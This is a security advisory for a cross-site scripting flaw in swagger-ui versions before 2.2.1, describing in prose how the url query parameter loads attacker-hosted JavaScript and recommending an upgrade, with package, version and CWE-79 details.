Описание
Cross-Site Scripting in swagger-ui
Affected versions of swagger-ui are vulnerable to cross-site scripting. This vulnerability exists because swagger-ui automatically executes external Javascript that is loaded in via the url query string parameter when a Content-Type: application/javascript header is included.
An attacker can create a server that replies with a malicious script and the proper content-type, and then craft a swagger-ui URL that includes the location to their server/script in the url query string parameter. When viewed, such a link would execute the attacker's malicious script.
Recommendation
Update to 2.2.1 or later.
Пакеты
Наименование
swagger-ui
npm
Затронутые версииВерсия исправления
< 2.2.1
2.2.1
CVE ID
Дефекты
CWE-79
Связанные уязвимости
CVE ID
Дефекты
CWE-79